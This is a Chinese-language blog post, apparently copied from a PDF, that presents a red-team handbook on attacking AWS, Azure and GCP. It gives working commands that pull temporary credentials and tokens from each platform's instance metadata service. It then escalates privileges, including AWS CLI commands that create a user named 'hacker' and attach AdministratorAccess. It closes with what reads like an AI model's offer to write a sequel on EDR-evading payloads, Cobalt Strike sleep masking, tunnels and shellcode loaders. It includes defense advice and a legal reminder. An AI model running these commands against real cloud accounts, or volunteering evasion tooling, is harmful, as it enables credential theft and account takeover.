欢迎来到我的博客

��_�.☁ 《云环境渗透专项AWS Azure GCP 权限 提升与元数据攻击实战手册》 ☁ 《云环境渗透专项：AWS / Azure / GCP 权限提升 与元数据攻击实战手册》 副标题：当你的 Access Key 泄露后，黑客能走多远？ 💡 这不是云安全理论课，而是红队在真实云战场上的“权限收割”路线图。 从一个泄露的 IAM 密钥，到接管整个 AWS 账户；从 Azure VM 的托管身份，到提权至全局管理员 ——我们将用真实命令 + 工具链 + 防御建议，还原攻击全链路。 🔍 一、为什么云渗透和传统内网渗透完全不同？ 维度 传统内网渗透 云环境渗透 攻击面 主机、服务、网络协议 API、IAM 策略、元数据服务、 Serverless 配置 权限载体 用户账户、本地令牌 Access Key、Service Principal、Managed Identity 横向移动 Pass-the-Hash、SMB Relay AssumeRole、Token Exchange、Cross-Account Trust 关键资产 域控、数据库 S3 存储桶、Key Vault、 CloudTrail 日志、Lambda 函 数 331

📌 核心差异：云环境的一切操作都通过 API 调用完成，而 API 的权限由 策略（Policy） 决定。 攻击的本质 = 滥用过度授权的策略 。 ⚔ 二、三大云平台攻击路径详解 🟦 AWS：从 EC2 到接管整个账户 攻击起点：EC2 实例的 Instance Metadata Service (IMDS) 1 # 获取临时凭证（v1） 2 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 3 # 返回⻆色名，如 “WebAppRole” 4 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/WebAp pRole ✅ 返回 AccessKeyId , SecretAccessKey , Token —— 可直接用于 AWS CLI！ 权限提升路径：

1. 枚举当前权限（关键！）： 1 aws sts get-caller-identity 2 pacu iam__enum_permissions # 使用 Pacu 自动分析
2. 若拥有 iam + ec2 → 启动新实例并绑定高权限⻆色 → 拿下管 理员权限。
3. 若可访问 S3 → 搜索 config , credentials , backup.zip → 可能泄露其他密钥。
4. 终极目标：创建新用户并附加 AdministratorAccess ： 1 aws iam create-user —user-name hacker 2 aws iam attach-user-policy —user-name hacker —policy-arn arn:aws:iam::aw s/AdministratorAccess ⚠ 防御建议：禁用 IMDSv1，强制使用带 Token 的 IMDSv2；遵循最小权限原则 。 332

🟩 Azure：从 VM 到 Entra ID 全局管理员 攻击起点：Azure VM 的 Managed Identity 1 # 获取访问令牌（用于调用 Azure Resource Manager） 2 $token = (Invoke-RestMethod -Headers @{“Metadata”=“true”} -Uri “http://169. 254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource= https://management.azure.com/“).access_token 权限提升路径：

1. 列出订阅资源： 1 curl -s -H “Authorization: Bearer $token” https://management.azure.com/subs criptions?api-version=2020-01-01
2. 若为“Contributor”⻆色 → 可部署 ARM 模板 → 创建新用户或修改 NSG。
3. 关键突破口：Entra ID（原 Azure AD）同步账户 使用 NetExec 扫描域内 MSOL_* 账户，定位 Azure AD Connect 同步服务器 。
4. 提取同步凭证 → 获得 Entra ID 写权限 → 重置全局管理员密码 或 分配“Global Administrator”⻆ 色 。 💡 致命配置：若 Azure RBAC 中用户被赋予 “User Access Administrator” ⻆色，可为自⼰分配任 意权限 。 🟥 GCP：从 Compute Engine 到 Project Owner 攻击起点：GCE 实例的 Metadata Server 1 # 获取访问令牌 2 TOKEN=$(curl -H “Metadata-Flavor: Google” http://metadata.google.internal/c omputeMetadata/v1/instance/service-accounts/default/token | jq -r .access_t oken) 权限提升路径：
5. 查看当前服务账号权限： 333

1 gcloud projects get-iam-policy PROJECT_ID —token $TOKEN 2. 若拥有 iam.serviceAccounts.actAs → 可模拟更高权限的服务账号。 3. 若可访问 Cloud Storage → 下载 .env 、 secrets.yaml → 泄露数据库密码或 API Key。 4. 利用 Firebase / App Engine 配置错误 → 直接读取用户数据或执行代码。 🔍 侦察技巧：通过 LDAP 搜索含 “gcp” 关键字的账户（NetExec 支持）。 🛡 三、通用防御策略（DevSecOps 必看） ⻛险点 防御措施 过度授权 实施最小权限；定期用 IAM Access Analyzer （AWS）或 Azure Policy 审计 凭证硬编码 使用 托管身份（Managed Identity） 替代 Access Key；禁止在代码中写密钥 元数据服务暴露 AWS：启用 IMDSv2；GCP：限制 metadata 查 询权限；Azure：关闭不必要的 identity 日志缺失 强制开启 CloudTrail（AWS）、Activity Log （Azure）、Audit Logs（GCP） 并告警异常 API 调用 无 MFA 为所有特权账户启用 多因素认证（MFA） 🧰 四、红队必备工具清单 工具 用途 链接 Pacu AWS 渗透框架，自动枚举/提 https://github.com/RhinoSec 权 urityLabs/pacu NetExec 跨云凭证提取（AWS/Azure） 334

ScoutSuite 多云安全配置审计 https://github.com/nccgroup /ScoutSuite CloudFox 自动化云资产关系图谱 https://github.com/BishopFo x/cloudfox 📜 五、法律与道德提醒 云渗透测试必须获得 CSP（云服务商）和客户双重授权！ ● （例如：AWS 要求提前提交 渗透测试申请） 禁止测试底层基础设施（如 Hypervisor、物理网络）——这属于 CSP 责任 。 ● 发现漏洞后，立即上报，禁止数据导出或破坏。 ● ✅ 结语：云不是更安全，只是攻击面转移了。 真正的安全，来自于对 身份、权限、日志 三位一体的掌控。 这份手册，既是攻击指南，也是防御蓝图。 需要我继续生成第二篇 《免杀 Payload 生成与流量加密实战》 吗？内容将涵盖： Cobalt Strike BOF 与 Sleep Masking ● DNS / ICMP 隧道绕过 EDR ● 自定义 Shellcode 加载器（C++ / Go） ● 流量混淆（HTTPS + WebSocket + CDN） ● 只需说一句：“继续！” 335